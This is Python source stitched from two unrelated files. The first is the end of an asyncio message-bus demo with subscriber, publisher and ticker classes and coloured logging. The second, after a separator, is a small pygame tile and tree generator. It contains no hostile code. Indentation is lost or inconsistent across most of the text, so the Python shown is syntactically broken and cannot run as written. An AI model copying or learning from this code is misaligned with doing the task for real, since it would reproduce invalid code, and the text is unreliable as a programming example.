self._log.info(Fore.WHITE + 'MESSAGE POPPED: {} rxd msg #{}: priority: {}; desc: "{}"; value: '.format(\
self._name, _message.number, _message.priority, _message.description) + Fore.WHITE + Style.NORMAL + '{}'.format(_message.value))
                time.sleep(3.0) # simulate slow processing; this blocks the Ticker callback
self._log.info(Fore.WHITE + Style.BRIGHT + 'MESSAGE PROCESSED: {} rxd msg #{}: priority: {}; desc: "{}"; value: '.format(\
self._name, _message.number, _message.priority, _message.description) + Fore.WHITE + Style.NORMAL + '{}'.format(_message.value))
else: # we're not interested
if self._discard_ignored:
_message = self._deque.pop()
self._log.info(Fore.YELLOW + Style.DIM + 'MESSAGE discarded: {}'.format(_message.event.name))
else:
self._log.info(Fore.YELLOW + Style.DIM + 'MESSAGE ignored: {}'.format(_peek.event.name))
else:
            self._log.debug(Style.DIM + 'TICK! queue is empty.')
# ..............................................................................
def filter(self, message):
        '''
        Overrides the default filter: passes only INFRARED_PORT or
        INFRARED_STBD messages; anything else is filtered out as None.
        '''
return message if ( message.event is Event.INFRARED_PORT or message.event is Event.INFRARED_STBD ) else None
# ..............................................................................
def handle_message(self, message):
        '''
        Overrides the superclass' method, pushing the message onto the head
        of the queue; actual processing happens later, in the tick() callback.
        '''
self._deque.appendleft(message)
self._log.info(Fore.YELLOW + 'MySubscriber add to queue: {} rxd msg #{}: priority: {}; desc: "{}"; value: '.format(\
self._name, message.number, message.priority, message.description) + Fore.WHITE + Style.NORMAL + '{}'.format(message.value) \
+ Style.BRIGHT + ' {} in queue.'.format(len(self._deque)))
# ..............................................................................
def subscribe(self):
'''
Subscribes to the MessageBus by passing the call to the superclass.
'''
self._log.debug(Fore.YELLOW + 'MySubscriber.subscribe() called.')
return super().subscribe()
# ..............................................................................
class MyPublisher(Publisher):
    '''
    Extends Publisher as a typical publisher use case class.
    '''
def __init__(self, message_factory, message_bus, level=Level.INFO):
super().__init__(message_factory, message_bus, level)
self._log.info('ready.')
# ..........................................................................
    def publish(self, iterations):
        '''
        Passes the publish call to the superclass, returning its coroutine.
        '''
        self._log.info(Fore.MAGENTA + Style.BRIGHT + 'MyPublisher.publish() called; delegating to superclass.')
        return super().publish(iterations)
# main .........................................................................
def main(argv):
_log = Logger("main", Level.INFO)
try:
_log.info(Fore.BLUE + 'configuring objects...')
_loop_freq_hz = 10
_ticker = Ticker(_loop_freq_hz, Level.INFO)
_message_factory = MessageFactory(Level.INFO)
        _message_bus = MessageBus()
        _publisher = MyPublisher(_message_factory, _message_bus)
        _publish = _publisher.publish(10)
_log.info(Fore.BLUE + 'generating subscribers...')
_subscribers = []
_subscriptions = []
for x in range(10):
_subscriber = MySubscriber('s{}'.format(x), _ticker, _message_bus)
_subscribers.append(_subscriber)
_subscriptions.append(_subscriber.subscribe())
_ticker.enable()
loop = asyncio.get_event_loop()
_log.info(Fore.BLUE + 'starting loop...')
loop.run_until_complete(asyncio.gather(_publish, *_subscriptions))
_log.info(Fore.BLUE + 'closing {} subscribers...'.format(len(_subscribers)))
for subscriber in _subscribers:
            _log.info(Fore.BLUE + 'subscriber {} has {:d} messages remaining in queue: {}'.format(subscriber.name, subscriber.queue_length(), subscriber.print_queue_contents()))
_log.info(Fore.BLUE + 'loop complete.')
except KeyboardInterrupt:
_log.info('caught Ctrl-C; exiting...')
except Exception:
_log.error('error processing message bus: {}'.format(traceback.format_exc()))
finally:
_log.info('exit.')
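# Execution note: MyPublisher.publish() and MySubscriber.subscribe() are not
# awaited when called above; each returns a coroutine, and all of them are
# driven concurrently by the single run_until_complete(asyncio.gather(...))
# call. An equivalent modern form (Python 3.7+) would be:
#
#     async def run_all():
#         await asyncio.gather(_publish, *_subscriptions)
#     asyncio.run(run_all())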
# call main ....................................................................
if __name__ == "__main__":
main(sys.argv[1:])
#EOF
# ..............................................................................
# terrain_gen.py | MrKren/TTA | MIT license | hexsha ee7ba2306ea22a03b64701fd0713ad3f2419cb98
# ..............................................................................
import pygame
import random
class Tile(pygame.sprite.Sprite):
"""Tile class that acts as a sprite"""
# Creates sprite tile with image
def __init__(self, original_image, mask_image):
super().__init__()
self.image = original_image
self.mask_image = mask_image
self.rect = self.image.get_rect()
self.mask = pygame.mask.from_surface(self.mask_image)
# Adds movement to the game
def movex(self, speed):
self.rect.x += speed
def movey(self, speed):
self.rect.y += speed
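# A minimal usage sketch for Tile (the image file name is hypothetical, and it
# assumes pygame.display has been initialised so convert_alpha() works):
#
#     grass = pygame.image.load('grass.png').convert_alpha()
#     tile = Tile(grass, grass)   # same surface for image and collision mask
#     tile.movex(-4)              # scroll the tile 4 px to the left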
class GenTerrain(object):
"""Generates all tiles within a specified range"""
def __init__(self, tile_size, l_x, l_y, image):
# List of tiles that can be added to sprite Group
self.tile_list = []
# For loop that generates each sprite for each tile on the map
for i in range(l_x):
for j in range(l_y):
xpos = i*tile_size
ypos = j*tile_size
pos = xpos, ypos
tile = Tile(image, image)
tile.rect.x, tile.rect.y = pos
self.tile_list.append(tile)
print("Tiles Added:", len(self.tile_list))
class GenTrees(object):
    """Randomly scatters tree sprites across the interior of the map"""
def __init__(self, tile_size, map_size, images, mask_images, percentage):
self.tree_list = []
mask_image = mask_images[0]
for i in range(map_size-2):
for j in range(map_size-3):
                if random.random() < percentage:  # place a tree with the given probability
xpos = (i+1)*tile_size
ypos = (j+1)*tile_size
pos = xpos, ypos
tree_image = random.choice(images)
                    if tree_image == images[0]:
                        mask_image = mask_images[0]
                    elif tree_image == images[1]:
                        mask_image = mask_images[1]
tree = Tile(tree_image, mask_image)
tree.rect.x, tree.rect.y = pos
self.tree_list.append(tree)
print("Trees Added:", len(self.tree_list))